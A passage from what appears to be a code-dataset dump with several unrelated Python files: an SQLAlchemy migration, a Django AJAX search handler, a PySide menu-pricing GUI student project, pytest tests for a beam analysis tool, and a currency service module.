[[\"1\",\"0\",\"1\",\"0\",\"0\"],[\"1\",\"0\",\"1\",\"1\",\"1\"],[\"1\",\"1\",\"1\",\"1\",\"1\"],[\"1\",\"0\",\"0\",\"1\",\"0\"]]\r\n\r\nprint(maximalRectangle(matrix))","sub_path":"stack/area.py","file_name":"area.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"181330523","text":"from opengever.core.upgrade import SchemaMigration\nfrom sqlalchemy import Column\nfrom sqlalchemy import ForeignKey\nfrom sqlalchemy import Integer\nfrom sqlalchemy import String\nfrom sqlalchemy.sql.expression import column\nfrom sqlalchemy.sql.expression import table\n\n\nclass AddOrgRoleParticipations(SchemaMigration):\n \"\"\"Add OrgRole participations.\n \"\"\"\n\n def migrate(self):\n self.make_contact_id_nullable()\n\n self.add_participation_type()\n self.insert_contact_participation_type()\n self.make_participation_type_non_nullable()\n\n self.add_org_role_participation()\n\n def make_contact_id_nullable(self):\n self.op.alter_column('participations', 'contact_id',\n nullable=True,\n existing_type=Integer)\n\n def add_participation_type(self):\n self.op.add_column(\n 'participations',\n Column('participation_type', String(30), nullable=True))\n\n def insert_contact_participation_type(self):\n participation_table = table(\n 'participations', column('participation_type'))\n\n self.execute(participation_table.update().values(\n participation_type='contact_participation'))\n\n def make_participation_type_non_nullable(self):\n self.op.alter_column('participations', 'participation_type',\n existing_type=String(30), nullable=False)\n\n def add_org_role_participation(self):\n self.op.add_column(\n 'participations',\n Column('org_role_id', Integer, ForeignKey('org_roles.id')))\n","sub_path":"opengever/contact/upgrades/20160824101726_add_org_role_participations/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"424426229","text":"# NOTE: Decided it was best to keep AJAX calls app-separated\nimport ujson as json\nfrom django.http import HttpResponse, HttpResponseServerError\nimport re\n\n# from django.contrib.auth.models import Group\n#\n# from haystack.query import SearchQuerySet\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n# Kind of a weird import, probably should have a utils file or something\nfrom .views import get_search_queryset_with_permissions\nimport html\n\n\ndef main(request):\n \"\"\"Default to Server Error\"\"\"\n return HttpResponseServerError()\n\n\ndef fetch_global_search_suggestions(request):\n \"\"\"Return global search suggestions in JSON\n\n Receives the following from POST:\n text - The text the user has entered thus far into the search bar\n \"\"\"\n data = []\n\n # Pattern for removing non-alphanumeric\n regex_pattern = re.compile('[\\W_]+', re.UNICODE)\n\n # Get text from request\n # Only takes alphanumeric at the moment\n text = regex_pattern.sub(' ', request.POST.get('text', ''))\n\n # Filter on group: either get all with no group or those with a group the user has\n sqs = get_search_queryset_with_permissions(request)\n\n suggestions = sqs.autocomplete(text=text)\n # At the moment, I just take the first ten results\n for suggestion in suggestions[:10]:\n # data.append(suggestion.suggestion)\n data.append({\n 'label': html.unescape(suggestion.text.split('\\n')[0]),\n 'value': html.unescape(suggestion.text.split('\\n')[1])\n })\n\n return 
HttpResponse(json.dumps(data),\n                        content_type=\"application/json\")\n\nswitch = {\n    'fetch_global_search_suggestions': fetch_global_search_suggestions,\n}\n\n\ndef ajax(request):\n    \"\"\"Switch to correct function given POST call\n\n    Receives the following from POST:\n    call -- What function to redirect to\n    \"\"\"\n    post_call = request.POST.get('call', '')\n\n    # Abort if there is no valid call sent to us from Javascript\n    if not post_call:\n        logger.error('post_call not present in request to ajax')\n        return HttpResponseServerError()\n\n    # Route the request to the correct handler function\n    # and pass request to the functions\n    try:\n        # select the function from the dictionary\n        procedure = switch[post_call]\n\n    # If all else fails, handle the error message\n    except KeyError:\n        return main(request)\n\n    else:\n        # execute the function\n        return procedure(request)\n","sub_path":"mps/ajax.py","file_name":"ajax.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"560934107","text":"#!/usr/bin/env python\n\"\"\"\nName: Craig Opie\nClass: CENT110\nFile: project1.py\n\nAlgorithm:\n1) Add support for PySide and PySide2:\n    a. Import required modules from PySide.\n    b. Port the PySide.QtGui as QtWidgets to support the code written in PySide2.\n    c. If PySide is not installed:\n    d. Import required modules from PySide2.\n2) Import the sys module.\n3) Create a class(object) named MyGui using the properties of the object from PySide, QMainWindow.\n4) Define the function '__init__' (standard library) for initiation of the object importing any properties of the object itself (from here on referenced as self).\n    a. Setup the Main Dialog Box 'self' properties:\n        1. Execute the initiation of the object QMainWindow from PySide.\n        2. Create a new instance of the object 'QTextEdit' in self and name it 'text'.\n        3. Make it so that 'text' is read only.\n        4. Make 'text' fill the dialog box as the central widget.\n        5. Make the Main Dialog Box (self) 250x250 pixels away from the upper left corner of the screen and 700x400 pixels large.\n        6. Make the title in the uppermost portion of 'self' read \"Craig Opie - Project 1\".\n        7. Create 'self' as a Dialog Box and make it visible.\n    b. Establish 'self' wide variables (similar to Public for other languages).\n        1. 'allPriceList' as a list for all prices.\n        2. 'appPriceList' as a list for appetizer prices.\n        3. 'entreePriceList' as a list for entree prices.\n        4. 'dessertPriceList' as a list for dessert prices.\n        5. 'otherPriceList' as a list for all other items' prices.\n        6. 'data_' as a string containing the xml header information and formatting.\n        7. 'closingData' as a string for the closing information that will be added after content.\n        8. 'finalData' as a string for combining the 'data_' and 'closingData' strings.\n        9. 'itemList' as a string that will be split into a list of items.\n        10. 'splitData' as a string from the user input that will be split.\n        11. 'foodBox' as a string that will contain the text from the widget 'foodBox'.\n        12. 'typeBox' as a string that will contain the text from the widget 'typeBox'.\n        13. 'typeBoxString' as a string that will contain the properly formatted information in 'typeBox' used for comparison operations.\n        14. 'priceBox' as a float that will contain the value from the widget 'priceBox'.\n        15. 'max_price' as a float that will contain the highest price of all the items.\n        16. 
'min_price' as a float that will contain the lowest price of all the items.\n5) Define a function called 'initMenu' for 'self' that will create a menu bar on Main Dialog Box.\n a. Create a new instance of the object 'menuBar' from PySide.\n b. Create a new instance of a 'menuBar' function called 'addMenu' where we define 'file'.\n c. Add the following items to the 'file' in 'menuBar':\n 1. Create a new selectable object named 'addItem' which displays \"Add Item\".\n 2. If 'addItem' is selected perform the function 'addItem' in 'self'.\n 3. Display the object 'addItem' in the 'menuBar' under 'file'.\n 4. Create a new selectable object named 'save_' which displays \"Save\".\n 5. If 'addItem' is selected perform the function 'saveFile' in 'self'.\n 6. Display the object 'save_' in the 'menuBar' under 'file'.\n 7. Create a new selectable object named 'open_' which displays \"Open\".\n 8. If 'addItem' is selected perform the function 'openFile' in 'self'.\n 9. Display the object 'open_' in the 'menuBar' under 'file'.\n 10. Create a new selectable object named 'quit_' which displays \"Quit\".\n 11. If 'addItem' is selected perform the function 'quitFile' in 'self'.\n 12. Display the object 'quit_' in the 'menuBar' under 'file'.\n6) Define a function called 'saveFile' for 'self' that will allow the user to save the information in 'text' to a plain text file format.\n a. Appends user input into a string with pre-selected split identifiers to sort into prepare the data to be split.\n 1. Split 'splitData' anywhere \"\\n\" is present and append line to 'itemList'.\n 2. For eachline in 'itemList':\n i. Split 'itemList' anywhere \"|\" is present and append items to a list named 'items'.\n ii. Append str(\"\\n \") to 'data_'.\n iii.Append str(\"\\n 'items[0]'\") to 'data_'.\n iv. Append str(\"\\n 'items[1]''items[2]'\") to 'data_'.\n vi. Append str(\"\\n \") to 'data_'.\n b. Append the closing tags and final mxl data to 'closingData'.\n 1. Append str(\"\\n 'overallAvg'\") to 'closingData'.\n 2. Append str(\"\\n 'appAvg'\") to 'closingData'.\n 3. Append str(\"\\n 'entreeAvg'\") to 'closingData'.\n 4. Append str(\"\\n 'dessertAvg'\") to 'closingData'.\n 5. Append str(\"\\n 'otherAvg'\") to 'closingData'.\n 6. Append str(\"\\n \")\n 7. Append str(\"\\n 'max_price'\") to 'closingData'.\n 8. Append str(\"\\n 'min_price'\") to 'closingData'.\n 9. Append str(\"\\n \") to 'closingData'.\n 10. Append str(\"\\n\") to 'closingData'.\n c. Concatenate 'startData' + 'userData' + 'closingData' and assign to 'finalData'.\n d. Open a save file dialog box and allow the user to select location and name for the file.\n e. If the user specifies a filename:\n 1. Create a new document with write abilities and assign it to the variable 'outfile'.\n 2. Create a new variable 'contents' and assign the text stored in 'text'.\n 3. Write the value of 'contents' to 'outfile'.\n 4. Close 'outfile'.\n7) Define a function called 'openFile' for 'self' that will allow the user to open the information in a plain text file and display in 'text'.\n a. Open an open file dialog box and allow the user to select location and name for the file.\n b. If the user specifies a filename:\n 1. Open the document with read abilities and assign it to the variable 'infile'.\n 2. Create a new variable 'contents' and assign the text stored in 'infile'.\n 3. Write the value of 'contents' to 'text'.\n 4. 
Close 'infile'.\n8) Define a function called 'addFile' for 'self' that will open a Child Dialog Box for the user to enter values to be stored in an xml file.\n a. Setup the Child Dialog Box properties.\n 1. Create a new instance of QDialog for 'self' named 'myDialog'.\n 2. Set 'myDialog' title to display \"Enter Data\".\n 3. Set 'myDialog' to open 350x350 pixels away from the top left corner of the screen and 400x200 pixels large.\n 4. Create a new instance of 'QGridLayout' named 'layout'.\n 5. Set 'myDialog' to use 'layout'.\n b. Create a first row of widgets for user input.\n 1. Create a label named 'labelFood' that contains the text \"Enter Food\".\n 2. Place 'labelFood' in the first column on the first row.\n 3. Create a text box named 'foodBox' that allows the user to input text.\n 4. Place 'foodBox' in the second column on the first row.\n 5. Assign 'foodBox' text to the 'self' variable 'foodBox'.\n c. Create a second row of widgets for user input.\n 1. Create a label named 'labelType' that contains the text \"Enter Type\".\n 2. Place 'labelType' in the first column on the second row.\n 3. Create a text box named 'typeBox' that allows the user to input text.\n 4. Place 'typeBox' in the second column on the first row.\n 5. Assign 'typeBox' text to the 'self' variable 'typeBox'.\n d. Create a third row of widgets for user input.\n 1. Create a label named 'labelPrice' that contains the text \"Enter Price\".\n 2. Place 'labelPrice' in the first column on the third row.\n 3. Create a text box named 'priceBox' that allows the user to input text.\n 4. Place 'priceBox' in the second column on the third row.\n 5. Assign 'priceBox' text to the 'self' variable 'priceBox'.\n e. Creates a third column for buttons that are styled for the user.\n 1. Create an instance of 'QDialogButtonBox' named 'buttons'.\n 2. Set the orientation of 'buttons' to be vertical.\n 3. Create a button with the text \"Add\" and assign it the role of accepted.\n 4. Create a button with the text \"Cancel\" and assign it the role of reject.\n 5. Connect the rejected role to the close function.\n 6. Connect the accepted role to the 'appendList' function of 'self'.\n 7. Change the button layout to be centered vertically and horizontally, spanned over the three rows.\n f. Execute the above code and create the Child Dialog Box to see.\n9) Define a function called 'appendList' for 'self' that will take the information from the user input append it to a string, split the string into a list, add items from the list to a string in xml format, and set the Main Dialog Box 'text' to be a new xml string.\n a. If there are previous entries from the user:\n 1. Compare 'priceBox' and 'max_price' and store the larger amount in 'max_price'.\n 2. Compare 'priceBox' and 'min_price' and store the smaller amount in 'min_price'.\n b. If there aren't any previous entries from the user:\n 1. Store the value in 'priceBox' in 'max_price'.\n 2. Store the value in 'priceBox' in 'min_price'.\n c. Sort item prices based off type of food and store the values in the associated list.\n 1. Append the value in 'priceBox' to the list 'allPriceList'.\n 2. Convert the value in 'typeBox' to lowercase and remove whitespace in the front and back of the value and store the new value in 'typeBoxString'.\n 3. If typeBoxString == \"appetizer\":\n i. Append the value in 'priceBox' into the list 'appPriceList' as a float.\n 4. Elif typeBoxString == \"entree\":\n i. Append the value in 'priceBox' into the list 'entreePriceList' as a float.\n 5. 
Elif typeBoxString == \"dessert\":\n i. Append the value in 'priceBox' into the list 'dessertPriceList' as a float.\n 6. Else:\n i. Append the value in 'priceBox' into the list 'otherPriceList' as a float.\n d. Prevent averaged values from dividing by zero and causing a math error:\n 1. If there are values in 'allPriceList':\n i. 'overallAvg' = the sum of values in 'allPriceList' divided by the number of values in 'allPriceList'.\n 2. If there aren't values in 'allPriceList':\n i. 'overallAvg' = the sum of values in 'allPriceList' divided by 1.00.\n 3. If there are values in 'appPriceList':\n i. 'appAvg' = the sum of values in 'appPriceList' divided by the number of values in 'appPriceList'.\n 4. If there aren't values in 'appPriceList':\n i. 'appAvg' = the sum of values in 'appPriceList' divided by 1.00.\n 5. If there are values in 'entreePriceList':\n i. 'entreeAvg' = the sum of values in 'entreePriceList' divided by the number of values in 'entreePriceList'.\n 6. If there aren't values in 'entreePriceList':\n i. 'entreeAvg' = the sum of values in 'entreePriceList' divided by 1.00.\n 7. If there are values in 'dessertPriceList':\n i. 'dessertAvg' = the sum of values in 'dessertPriceList' divided by the number of values in 'dessertPriceList'.\n 8. If there aren't values in 'dessertPriceList':\n i. 'dessertAvg' = the sum of values in 'dessertPriceList' divided by 1.00.\n 9. If there are values in 'otherPriceList':\n i. 'otherAvg' = the sum of values in 'otherPriceList' divided by the number of values in 'otherPriceList'.\n 10. If there aren't values in 'otherPriceList':\n i. 'otherAvg' = the sum of values in 'otherPriceList' divided by 1.00.\n e. Appends user input into a string with selected split identifiers to sort into lists:\n 1. Appends 'foodBox' value concatenated with \"|\" to 'splitData'.\n 2. Appends 'typeBox' value concatenated with \"|\" to 'splitData'.\n 3. Appends 'priceBox' value concatenated with \"\\n\" to 'splitData'.\n f. Assign 'text' = 'splitData' to display xml in Main Dialog Box.\n g. Close the Child Dialog Box after Main Dialog Box is ready.\n10) Define a function called 'closeFile' for 'self' that will exit the application.\n a. 
Close 'self'.\n11) Create a new instance of 'QApplication' with \"sys.argv\" properties named 'app'.\n12) Create a new instance of 'MyGui' named 'mygui'.\n13) Run PySide and only exit PySide upon closing 'mygui'.\n\"\"\"\n\n# Import from PySide or PySide2 (QtWidgets)\ntry:\n from PySide import QtGui, QtCore\n import PySide.QtGui as QtWidgets\nexcept ImportError:\n from PySide2 import QtGui, QtCore, QtWidgets\nimport sys\n\n# Creates the Main Dialog Box as an Object (Class)\nclass MyGui(QtWidgets.QMainWindow):\n \"\"\" Main Dialog Box that allow reading plain text files \"\"\"\n def __init__(self):\n \"\"\" Initiallizes the Main Dialog Box and establishes object variables \"\"\"\n # Setup the Main Dialog Box properties\n QtWidgets.QMainWindow.__init__(self)\n self.initMenu()\n self.text = QtWidgets.QTextEdit()\n self.text.setReadOnly(True)\n self.setCentralWidget(self.text)\n self.setGeometry(250,250,700,400)\n self.setWindowTitle(\"Craig Opie - Project 1\")\n self.show()\n\n # Establish Object wide variables\n self.allPriceList = []\n self.appPriceList = []\n self.entreePriceList = []\n self.dessertPriceList = []\n self.otherPriceList = []\n self.startData = str('\\n\\n')\n self.userData = \"\"\n self.closingData = \"\"\n self.finalData = \"\"\n self.itemList = \"\"\n self.splitData = \"\"\n self.foodBox = \"\"\n self.typeBox = \"\"\n self.typeBoxString = \"\"\n self.overallAvg = 0.00\n self.appAvg = 0.00\n self.entreeAvg = 0.00\n self.dessertAvg = 0.00\n self.otherAvg = 0.00\n self.priceBox = 0.00\n self.max_price = 0.00\n self.min_price = 0.00\n\n def initMenu(self):\n \"\"\" Creates the Main Dialog Box menu items \"\"\"\n menubar = self.menuBar()\n fileMenu = menubar.addMenu(\"File\")\n\n # Opens a new Dialog for user input into pre-determined fields\n addItem = QtWidgets.QAction(\"Add Item\", self)\n addItem.triggered.connect(self.addItem)\n fileMenu.addAction(addItem)\n\n # Opens a save Dialog for the user to save the displayed information\n save_ = QtWidgets.QAction(\"Save\", self)\n save_.triggered.connect(self.saveFile)\n fileMenu.addAction(save_)\n\n # Opens a load Dialog for the user to load a plain text file to be displayed\n open_ = QtWidgets.QAction(\"Open\", self)\n open_.triggered.connect(self.openFile)\n fileMenu.addAction(open_)\n\n # Allows the user to quit the application\n quit_ = QtWidgets.QAction(\"Quit\", self)\n quit_.triggered.connect(self.closeFile)\n fileMenu.addAction(quit_)\n\n def saveFile(self):\n \"\"\" Saves information displayed in the Main Dialog Box to an xml format \"\"\"\n # Sorts the user input into lists and appends xml data to a string for the Main Dialog Box\n self.itemList = self.splitData.strip().split(\"\\n\")\n for eachline in self.itemList:\n items = eachline.split(\"|\")\n self.userData += str(\"\\n \")\n self.userData += str(\"\\n \"+items[0]+\"\")\n self.userData += str(\"\\n \"+items[1]+\"\")\n self.userData += str(\"\\n \"+items[2]+\"\")\n self.userData += str(\"\\n \")\n\n # Appends closing and final xml data to a string that is to be combined with the previous\n # String xml data\n self.closingData = str(\"\\n \"+str(\"%.2f\" % (self.overallAvg))+\"\")\n self.closingData += str(\"\\n \"+str(\"%.2f\" % (self.appAvg))+\"\")\n self.closingData += str(\"\\n \"+str(\"%.2f\" % (self.entreeAvg))+\"\")\n self.closingData += str(\"\\n \"+str(\"%.2f\" % (self.dessertAvg))+\"\")\n self.closingData += str(\"\\n \"+str(\"%.2f\" % (self.otherAvg))+\"\")\n self.closingData += str(\"\\n \")\n self.closingData += str(\"\\n \"+str(\"%.2f\" % 
(self.max_price))+\"\")\n self.closingData += str(\"\\n \"+str(\"%.2f\" % (self.min_price))+\"\")\n self.closingData += str(\"\\n \")\n self.closingData += str(\"\\n\")\n\n # Creates a final string of xml data to be displayed in the Main Dialog Box\n self.finalData = str(self.startData) + str(self.userData) + str(self.closingData)\n\n # Opens a Dialog Box for the user to select name and location of file to save 'finalData'\n filename, _ = QtWidgets.QFileDialog.getSaveFileName(self, \"Save File\",\".\")\n if (filename != \"\"):\n outfile = open(filename, \"w\")\n contents = self.finalData\n outfile.write(contents)\n outfile.close()\n\n def openFile(self):\n \"\"\" Opens a plain text file to display in the Main Dialog Box \"\"\"\n filename, _ = QtWidgets.QFileDialog.getOpenFileName(self, \"Open File\",\".\")\n if (filename != \"\"):\n infile = open(filename, \"r\")\n contents = infile.read()\n infile.close()\n self.text.setText(contents)\n\n def addItem(self):\n \"\"\" Creates a Child Dialog Box with user input fields to display in the Main Dialog Box \"\"\"\n # Setup the Child Dialog Box properties\n self.myDialog = QtWidgets.QDialog(self)\n self.myDialog.setWindowTitle(\"Enter Data\")\n self.setGeometry(350,350,400,200)\n layout = QtWidgets.QGridLayout()\n self.myDialog.setLayout(layout)\n\n # Create the first row of widgets for user input\n labelFood = QtWidgets.QLabel(\"Enter Food\")\n layout.addWidget(labelFood,0,0)\n foodBox = QtWidgets.QLineEdit()\n layout.addWidget(foodBox,0,1)\n self.foodBox = foodBox\n\n # Create the second row of widgets for user input\n labelType = QtWidgets.QLabel(\"Enter Type\")\n layout.addWidget(labelType,1,0)\n typeBox = QtWidgets.QLineEdit()\n layout.addWidget(typeBox,1,1)\n self.typeBox = typeBox\n\n # Create the third row of widgets for user input\n labelPrice = QtWidgets.QLabel(\"Enter Price\")\n layout.addWidget(labelPrice,2,0)\n priceBox = QtWidgets.QLineEdit()\n layout.addWidget(priceBox,2,1)\n self.priceBox = priceBox\n\n # Creates a third column for buttons that are styled and allows user control\n buttons = QtWidgets.QDialogButtonBox()\n buttons.setOrientation(QtCore.Qt.Vertical)\n buttons.addButton(\"Add\",QtWidgets.QDialogButtonBox.AcceptRole)\n buttons.addButton(\"Cancel\",QtWidgets.QDialogButtonBox.RejectRole)\n # Exits the Child Dialog Box without saving/appending information to the Main Dialog Box\n self.myDialog.connect(buttons,QtCore.SIGNAL(\"rejected()\"),self.myDialog.close)\n # Exits the Child Dialog Box but saves/appends information to the Main Dialog Box\n self.myDialog.connect(buttons,QtCore.SIGNAL(\"accepted()\"),self.appendList)\n layout.addWidget(buttons,0,2,3,1,QtCore.Qt.AlignCenter)\n\n # Executes the above code to create the Child Dialog Box\n self.myDialog.exec_()\n\n def appendList(self):\n \"\"\" Updates lists and variables from the user input to display in the Main Dialog Box \"\"\"\n # If there are no previous entries the Max and Min values are set to equal the first entry\n # Otherwise, the item price entered is compared to see if it is the new Max or Min\n if len(self.allPriceList) != 0:\n if float(self.priceBox.text().strip()) > self.max_price:\n self.max_price = float(self.priceBox.text().strip())\n if float(self.priceBox.text().strip()) < self.min_price:\n self.min_price = float(self.priceBox.text().strip())\n else:\n self.max_price = float(self.priceBox.text().strip())\n self.min_price = float(self.priceBox.text().strip())\n\n # Sorts item price based off type of food and stores in a list for statistics\n 
self.allPriceList.append(float(self.priceBox.text().strip()))\n        self.typeBoxString = self.typeBox.text().lower().strip()\n        if str(self.typeBoxString) == \"appetizer\":\n            self.appPriceList.append(float(self.priceBox.text().strip()))\n        elif str(self.typeBoxString) == \"entree\":\n            self.entreePriceList.append(float(self.priceBox.text().strip()))\n        elif str(self.typeBoxString) == \"dessert\":\n            self.dessertPriceList.append(float(self.priceBox.text().strip()))\n        else:\n            self.otherPriceList.append(float(self.priceBox.text().strip()))\n\n        # Prevents averaged values from dividing by zero and causing an error\n        if len(self.allPriceList) > 0:\n            self.overallAvg = (sum(self.allPriceList)/len(self.allPriceList))\n        else:\n            self.overallAvg = (sum(self.allPriceList)/1.00)\n        if len(self.appPriceList) > 0:\n            self.appAvg = (sum(self.appPriceList)/len(self.appPriceList))\n        else:\n            self.appAvg = (sum(self.appPriceList)/1.00)\n        if len(self.entreePriceList) > 0:\n            self.entreeAvg = (sum(self.entreePriceList)/len(self.entreePriceList))\n        else:\n            self.entreeAvg = (sum(self.entreePriceList)/1.00)\n        if len(self.dessertPriceList) > 0:\n            self.dessertAvg = (sum(self.dessertPriceList)/len(self.dessertPriceList))\n        else:\n            self.dessertAvg = (sum(self.dessertPriceList)/1.00)\n        if len(self.otherPriceList) > 0:\n            self.otherAvg = (sum(self.otherPriceList)/len(self.otherPriceList))\n        else:\n            self.otherAvg = (sum(self.otherPriceList)/1.00)\n\n        # Appends user input into a string with selected split identifiers to sort into lists\n        self.splitData += str(self.foodBox.text().title().strip() + \"|\")\n        self.splitData += str(self.typeBox.text().title().strip() + \"|\")\n        self.splitData += str(\"%.2f\" % (float(self.priceBox.text().strip())) + \"\\n\")\n\n        # Sets the value of the Main Dialog Box\n        self.text.setText(self.splitData)\n\n        # Closes the Child Dialog after the Main Dialog Box is displaying the updated data.\n        self.myDialog.done(0)\n\n    def closeFile(self):\n        self.close()\n\n# Specifies the variable that references Qt module data\napp = QtWidgets.QApplication(sys.argv)\n\n# Creates an instance of the MyGui Class/Object\nmygui = MyGui()\n\n# Executes the above code to create the Main Dialog Box\nsys.exit(app.exec_())\n","sub_path":"projects/project1/project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":23412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"343624863","text":"from ast import literal_eval\nfrom pathlib import Path\nimport sys\n\nimport matplotlib\nimport numpy as np\nimport pandas as pd\nimport pytest\nfrom pandas.testing import assert_frame_equal\n\nfrom pylhc import bsrt_analysis\n\n# Forcing non-interactive Agg backend so rendering is done similarly across platforms during tests\nmatplotlib.use(\"Agg\")\n\nINPUTS_DIR = Path(__file__).parent.parent / \"inputs\"\nBSRT_INPUTS = INPUTS_DIR / \"bsrt_analysis\"\nBASELINE_DIR = str(INPUTS_DIR / \"mpl_bsrt_baseline\")\n\ndef test_bsrt_df(_bsrt_df):\n    results = bsrt_analysis.main(directory=str(BSRT_INPUTS), beam=\"B1\")\n    assert_frame_equal(\n        results[\"bsrt_df\"].sort_index(axis=1),\n        _bsrt_df.copy().sort_index(axis=1),\n        check_dtype=False, check_index_type=False\n    )\n\n\ndef test_select_by_time():\n    time_df = pd.DataFrame(index=np.linspace(0, 10, 11), data={\"A\": np.linspace(0, 10, 11)})\n    with pytest.raises(AssertionError):\n        bsrt_analysis._select_files({\"starttime\": 3, \"endtime\": 1}, time_df)\n    assert_frame_equal(\n        bsrt_analysis._select_files({\"starttime\": 1, \"endtime\": 3}, 
time_df), time_df.loc[1:3]\n )\n assert_frame_equal(\n bsrt_analysis._select_files({\"starttime\": 1, \"endtime\": None}, time_df), time_df.loc[1:]\n )\n assert_frame_equal(\n bsrt_analysis._select_files({\"starttime\": None, \"endtime\": 3}, time_df), time_df.loc[:3]\n )\n\n\nclass TestPlotting:\n @pytest.mark.mpl_image_compare(baseline_dir=BASELINE_DIR)\n def test_fitvarplot(self, _bsrt_df):\n return bsrt_analysis.plot_fit_variables(\n {\"show_plots\": False, \"outputdir\": None, \"kick_df\": None}, _bsrt_df.copy()\n )\n\n @pytest.mark.mpl_image_compare(baseline_dir=BASELINE_DIR)\n def test_fitvarplot_with_kick_df(self, _bsrt_df, _kick_df):\n return bsrt_analysis.plot_fit_variables(\n {\"show_plots\": False, \"outputdir\": None, \"kick_df\": _kick_df}, _bsrt_df.copy()\n )\n\n @pytest.mark.mpl_image_compare(baseline_dir=BASELINE_DIR)\n def test_fullcrossection(self, _bsrt_df):\n return bsrt_analysis.plot_full_crosssection(\n {\"show_plots\": False, \"outputdir\": None, \"kick_df\": None}, _bsrt_df.copy()\n )\n\n @pytest.mark.mpl_image_compare(baseline_dir=BASELINE_DIR)\n def test_fullcrossection_with_kick_df(self, _bsrt_df, _kick_df):\n return bsrt_analysis.plot_full_crosssection(\n {\"show_plots\": False, \"outputdir\": None, \"kick_df\": _kick_df}, _bsrt_df.copy()\n )\n\n @pytest.mark.mpl_image_compare(baseline_dir=BASELINE_DIR)\n def test_auxiliary_variables(self, _bsrt_df):\n return bsrt_analysis.plot_auxiliary_variables(\n {\"show_plots\": False, \"outputdir\": None, \"kick_df\": None}, _bsrt_df.copy()\n )\n\n @pytest.mark.mpl_image_compare(baseline_dir=BASELINE_DIR)\n def test_auxiliary_variables_with_kick_df(self, _bsrt_df, _kick_df):\n return bsrt_analysis.plot_auxiliary_variables(\n {\"show_plots\": False, \"outputdir\": None, \"kick_df\": _kick_df}, _bsrt_df.copy()\n )\n\n @pytest.mark.mpl_image_compare(baseline_dir=BASELINE_DIR)\n def test_crossection_for_timesteps(self, _bsrt_df, _kick_df):\n results = bsrt_analysis.plot_crosssection_for_timesteps(\n {\"show_plots\": False, \"outputdir\": None, \"kick_df\": _kick_df}, _bsrt_df.copy()\n )\n assert len(results) == len(_kick_df)\n return results[0]\n\n\n@pytest.fixture(scope=\"module\")\ndef _bsrt_df() -> pd.DataFrame:\n df = pd.read_csv(\n BSRT_INPUTS / bsrt_analysis._get_bsrt_tfs_fname(\"B1\"),\n engine=\"c\",\n parse_dates=True,\n index_col=\"TimeIndex\",\n quotechar='\"',\n converters={\n \"acquiredImageRectangle\": literal_eval,\n \"beam\": literal_eval,\n \"gateMode\": literal_eval,\n \"imageSet\": literal_eval,\n \"lastFitResults\": literal_eval,\n \"projDataSet1\": literal_eval,\n \"projDataSet2\": literal_eval,\n \"projPositionSet1\": literal_eval,\n \"projPositionSet2\": literal_eval,\n },\n )\n df.index = df.index.tz_localize(\"UTC\")\n return df\n\n\n@pytest.fixture()\ndef _kick_df() -> pd.DataFrame:\n return pd.DataFrame(\n index=[\n \"2018_07_24@11_38_30_000000\",\n \"2018_07_24@11_39_00_000000\",\n \"2018_07_24@11_39_30_000000\",\n \"2018_07_24@11_40_00_000000\",\n \"2018_07_24@11_40_30_000000\",\n ]\n )\n","sub_path":"tests/unit/test_bsrt_analysis.py","file_name":"test_bsrt_analysis.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"323974744","text":"\"\"\"Services module.\"\"\"\n\nfrom typing import Iterator\n\nfrom .dtos import CurrencyIn, CurrencyOut, CurrencyQuotationIn, CurrencyQuotationOut, ConverterIn, ConverterOut\nfrom .repositories import CurrencyRepository, CurrencyQuotationRepository, 
NotFoundError\n\n\nclass CurrencyService:\n def __init__(self, currency_repository: CurrencyRepository) -> None:\n self._repository: CurrencyRepository = currency_repository\n\n def get_currencies(self) -> Iterator[CurrencyOut]:\n currencies = map(lambda currency: CurrencyOut(abb=currency.abb, name=currency.name, id=currency.id),\n self._repository.get_all())\n\n return list(currencies)\n\n def get_currency_by_id(self, currency_id: int) -> CurrencyOut:\n currency = self._repository.get_by_id(currency_id)\n\n return CurrencyOut(abb=currency.abb, name=currency.name, id=currency.id)\n\n def create_currency(self, currency: CurrencyIn) -> CurrencyOut:\n currency = self._repository.add(currency)\n\n return CurrencyOut(abb=currency.abb, name=currency.name, id=currency.id)\n\n def update_currency(self, currency_id: int, currency: CurrencyIn) -> CurrencyOut:\n currency = self._repository.update_by_id(currency_id, currency)\n\n return CurrencyOut(abb=currency.abb, name=currency.name, id=currency.id)\n\n def delete_currency_by_id(self, currency_id: int) -> None:\n return self._repository.delete_by_id(currency_id)\n\n\nclass CurrencyQuotationService:\n def __init__(self, currency_quotation_repository: CurrencyQuotationRepository) -> None:\n self._repository: CurrencyQuotationRepository = currency_quotation_repository\n\n def get_currency_quotations(self, currency_id: int) -> Iterator[CurrencyQuotationOut]:\n currency_quotations = map(\n lambda currency_quotation: CurrencyQuotationOut(id=currency_quotation.id,\n currency_id=currency_quotation.currency_id,\n exchange_rate=currency_quotation.exchange_rate,\n date=currency_quotation.date),\n self._repository.get_all(currency_id))\n\n return list(currency_quotations)\n\n def get_currency_quotation_by_id(self, currency_id: int, quotation_id: int) -> CurrencyQuotationOut:\n currency_quotation = self._repository.get_by_id(currency_id, quotation_id)\n\n return CurrencyQuotationOut(id=currency_quotation.id,\n currency_id=currency_quotation.currency_id,\n exchange_rate=currency_quotation.exchange_rate,\n date=currency_quotation.date)\n\n def create_currency_quotation(self, currency_id: int,\n currency_quotation: CurrencyQuotationIn) -> CurrencyQuotationOut:\n currency_quotation = self._repository.add(currency_id, currency_quotation)\n\n return CurrencyQuotationOut(id=currency_quotation.id,\n currency_id=currency_quotation.currency_id,\n exchange_rate=currency_quotation.exchange_rate,\n date=currency_quotation.date)\n\n def update_currency_quotation(self, currency_id: int, quotation_id: int,\n currency_quotation: CurrencyQuotationIn) -> CurrencyQuotationOut:\n currency_quotation = self._repository.update_by_id(currency_id, quotation_id, currency_quotation)\n\n return CurrencyQuotationOut(id=currency_quotation.id,\n 